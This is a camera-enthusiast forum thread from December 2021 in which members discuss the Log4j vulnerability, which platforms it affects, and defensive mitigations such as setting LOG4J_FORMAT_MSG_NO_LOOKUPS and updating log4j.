Forgot Password
Pentax Camera Forums Home
 

Reply
Show Printable Version Search this Thread
12-12-2021, 12:07 PM   #16
Pentaxian




Join Date: Jul 2009
Location: Pugetopolis
Posts: 11,008
What's not clear to me is if this is common to ALL platforms running Apache's Log4j. I mean, often a vulnerability is also specific to the operating system. And an advisory often notes that but I did't see a mention of that in the OPs links. I'd think a ported Window's version of Log4j is not the same code as say a native Linux version of Apache's Log4j. But beats me.

12-12-2021, 01:05 PM   #17
Pentaxian




Join Date: Apr 2007
Location: Romania
Posts: 15,132
QuoteOriginally posted by tuco Quote
What's not clear to me is if this is common to ALL platforms running Apache's Log4j. I mean, often a vulnerability is also specific to the operating system. And an advisory often notes that but I did't see a mention of that in the OPs links. I'd think a ported Window's version of Log4j is not the same code as say a native Linux version of Apache's Log4j. But beats me.
All platforms are affected, AFAIK. This is a Java library.
12-12-2021, 01:28 PM   #18
Pentaxian




Join Date: Jul 2009
Location: Pugetopolis
Posts: 11,008
QuoteOriginally posted by Kunzite Quote
All platforms are affected, AFAIK. This is a Java library.
Okay thanks. Java code is multi-platform, but I'd think the underlying libraries for say directory access and what-not would be different enough from Windows to Unix in the compiled binary that it might affect the vulnerability. And the link to get an updated looked like Linux tarballs.
12-12-2021, 03:10 PM   #19
Pentaxian
Paul the Sunman's Avatar

Join Date: Aug 2011
Location: Melbourne
Photos: Gallery
Posts: 4,836
Are Apache legally liable for any damage inflicted due to the massive hole in their software?

12-12-2021, 03:54 PM   #20
Moderator
Site Supporter
Loyal Site Supporter
MarkJerling's Avatar

Join Date: May 2012
Location: Wairarapa, New Zealand
Photos: Gallery | Albums
Posts: 20,391
QuoteOriginally posted by beholder3 Quote
That is interesting. Running the download through Microsofts virustotal yields zero issues.
If you use the Lite version without web functions that's even safer.

Which software claimed the "unsafe"?
Windows Defender, or whatever it calls itself these days. Windows 10 anyway, gives me warnings when I try to download it and when I try to run it. Untrusted source and blah blah.
12-12-2021, 05:18 PM   #21
Loyal Site Supporter
Loyal Site Supporter
MossyRocks's Avatar

Join Date: Nov 2017
Location: Minnesota
Photos: Gallery | Albums
Posts: 2,978
QuoteOriginally posted by Paul the Sunman Quote
Are Apache legally liable for any damage inflicted due to the massive hole in their software?
Nope. All software makers disclaim any liability even software you actually pay for. However opensource software projects usually do a better job to fixing things like this than a closed source software. I had to use log4j once on a project at work and it was an awful complex mess even back then.
12-12-2021, 10:49 PM   #22
Site Supporter
Site Supporter




Join Date: Aug 2015
Location: Alabama
Photos: Gallery
Posts: 693
thanks for the info. Found it as part of a mathlab app

12-13-2021, 01:36 AM   #23
Digitiser of Film
Loyal Site Supporter
BigMackCam's Avatar

Join Date: Mar 2010
Location: North East of England
Posts: 20,571
QuoteOriginally posted by Kunzite Quote
It's with a certain Java library called log4j, which (unsurprisingly) is used to write application logs... except that an attacker might control what's written in the log, and the vulnerability means they could gain access to the system this way.

I'm not exactly clear on what it does and how; that's a subject for tomorrow (i.e. work day )
But the advice to update Java stands. Later versions (even later Java 8 versions) would mitigate at least partially this issue.

log4j is not used only by Apache web server.
I'm still not sure I understand the vulnerability fully, or rather how it's exploited

A quick search on my Windows 10 installation (I haven't checked Ubuntu yet) shows I have log4j-core-2.12.0.jar and log4j-api-2.12.0.jar in the lib directory of my Arduino IDE installation, and some brief digging suggests that IDE uses log4j for debug logging... but unless someone can remotely connect to my PC, how can they exploit the vulnerability? With an adequate firewall and correctly-managed ports, local application use of log4j should be safe, shouldn't it? GRC ShieldsUP! confirms my router isn't responding to UPnP probing, and all my ports have "stealth" status...

Last edited by BigMackCam; 12-13-2021 at 01:42 AM.
12-13-2021, 01:55 AM   #24
Pentaxian




Join Date: Apr 2007
Location: Romania
Posts: 15,132
Well, on Minecraft it apparently can be exploited just by typing stuff in the chat window

The attacker only needs to make your app to log certain stuff (through log4j).
Updating Java is a good advice, but it doesn't (fully) close the vulnerability. You'd have to update log4j to 2.15.0 - or rather, update your apps using log4j to versions including it.
Until these are available, this is what Apache recommends:
QuoteQuote:
Mitigation: In releases >=2.10, this behavior can be mitigated by setting either the system property log4j2.formatMsgNoLookups or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true. For releases >=2.7 and <=2.14.1, all PatternLayout patterns can be modified to specify the message converter as %m{nolookups} instead of just %m. For releases >=2.0-beta9 and <=2.10.0, the mitigation is to remove the JndiLookup class from the classpath: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class.
https://logging.apache.org/log4j/2.x/security.html

But I expect everyone's in a hurry to update their apps
12-13-2021, 02:14 AM   #25
Digitiser of Film
Loyal Site Supporter
BigMackCam's Avatar

Join Date: Mar 2010
Location: North East of England
Posts: 20,571
QuoteOriginally posted by Kunzite Quote
Well, on Minecraft it apparently can be exploited just by typing stuff in the chat window

The attacker only needs to make your app to log certain stuff (through log4j).
Updating Java is a good advice, but it doesn't (fully) close the vulnerability. You'd have to update log4j to 2.15.0 - or rather, update your apps using log4j to versions including it.
Until these are available, this is what Apache recommends:

https://logging.apache.org/log4j/2.x/security.html

But I expect everyone's in a hurry to update their apps
I've already added LOG4J_FORMAT_MSG_NO_LOOKUPS = true to my environment variables, updated my Java SDK and runtime, and I'm running the latest version of Arduino IDE (although it's still using v2.12 of log4j ). I'm not sure there's much else I can do at this point... nor, indeed, if the few online services I connect to put me at any real risk...

Last edited by BigMackCam; 12-13-2021 at 02:48 AM.
12-13-2021, 03:16 AM   #26
Pentaxian
Lord Lucan's Avatar

Join Date: Sep 2017
Location: South Wales
Photos: Gallery
Posts: 2,898
QuoteOriginally posted by StiffLegged Quote
I don't run Apache in any shape or form
Yes, that's unlikely because it is web-serving software - and very widely used.

Pentaxforums uses it.
12-13-2021, 04:28 AM - 1 Like   #27
Digitiser of Film
Loyal Site Supporter
BigMackCam's Avatar

Join Date: Mar 2010
Location: North East of England
Posts: 20,571
The more I read of this, the more it seems to be worth setting environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS = true just as a precautionary measure, whether-or-not you think you might have apps using log4j, and regardless of which OS you're using. Apparently, this mitigates the vulnerability for log4j versions 2.10 onwards, and it's simple enough that anyone can do it so long as they have (or can obtain) admin / supervisor rights to their machine. At worst, it'll have no effect whatsoever... at best, it stops the issue in its tracks.

For Windows 10, I did this by going to Start Menu -> System -> Advanced system settings -> Environment Variables and adding a System Variable.

In Ubuntu, I edited /etc/environment using a command line editor with supervisor rights, and added the environment variable to the end of the file. In my case, I entered: sudo nano /etc/environment [others should replace "nano" with the name of their favourite installed editor]

I don't know how you'd do it on a Mac, but I'm guessing it'll be fairly similar to Ubuntu...

Last edited by BigMackCam; 12-13-2021 at 05:47 AM.
12-13-2021, 04:56 AM - 1 Like   #28
Site Supporter
Site Supporter
StiffLegged's Avatar

Join Date: Jan 2018
Photos: Gallery
Posts: 4,560
QuoteOriginally posted by BigMackCam Quote
The more I read of this, the more it seems to be worth setting environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS = true just as a precautionary measure, whether-or-not you think you might have apps using log4j, and regardless of which OS you're using. Apparently, this mitigates the vulnerability for log4j versions 2.10 onwards, and it's simple enough that anyone can do it so long as they have (or can obtain) admin / supervisor rights to their machine. At worst, it'll have no effect whatsoever... at best, it stops the issue in its tracks.

For Windows 10, I did this by going to Start Menu -> System -> Advanced system settings -> Environment Variables and adding a System Variable..
Thanks Mike, that’s a big help.
12-14-2021, 04:34 AM   #29
Pentaxian




Join Date: May 2015
Photos: Gallery
Posts: 1,930
If I do a search for "log4j" and nothing is found am I right to think I am safe?

12-14-2021, 05:27 AM   #30
Digitiser of Film
Loyal Site Supporter
BigMackCam's Avatar

Join Date: Mar 2010
Location: North East of England
Posts: 20,571
QuoteOriginally posted by slartibartfast01 Quote
If I do a search for "log4j" and nothing is found am I right to think I am safe?
Search for log4j*.* or log4j*.jar - and make sure you begin the search from the root directory, including all sub-directories, and with supervisor rights. Do this for all user accounts on your PC. If no matching files are found, you should be fine... However, if you add the environment variable described above in the manner I detailed, then even if you do have log4j on your machine, this will close the vulnerability - at least for versions 2.10 onwards (current full release version is 2.14, I think, with a new 2.15 in beta to address this very problem). I'd recommend adding the environment variable regardless of whether you find any matching files. Belt and braces, so to speak
Reply

Bookmarks
  • Submit Thread to Facebook Facebook
  • Submit Thread to Twitter Twitter
  • Submit Thread to Digg Digg
Tags - Make this thread easier to find by adding keywords to it!
adobe, adobe software, log4j older adobe, photo industry, photography, security, security threat log4j, software, windows
Thread Tools Search this Thread
Search this Thread:

Advanced Search


Similar Threads
Thread Thread Starter Forum Replies Last Post
Audit / critique my laptop hardware / software / security setup, please? BigMackCam General Talk 27 05-30-2021 07:47 AM
Add a foot or ring to an older SMC Pentax-A 300 mm (older model) Pentagel Pentax SLR Lens Discussion 17 01-23-2020 08:59 AM
Adobe Photoshop Lightroom 4 Software vs. Adobe Photoshop Lightroom 5 Software Update ASheffield Digital Processing, Software, and Printing 3 05-08-2014 05:52 AM
Photoshop, Illustrator users must pay for critical security updates photolady95 Digital Processing, Software, and Printing 5 05-12-2012 09:21 AM



All times are GMT -7. The time now is 03:31 AM. | See also: NikonForums.com, CanonForums.com part of our network of photo forums!
  • Red (Default)
  • Green
  • Gray
  • Dark
  • Dark Yellow
  • Dark Blue
  • Old Red
  • Old Green
  • Old Gray
  • Dial-Up Style
Hello! It's great to see you back on the forum! Have you considered joining the community?
register
Creating a FREE ACCOUNT takes under a minute, removes ads, and lets you post! [Dismiss]
Top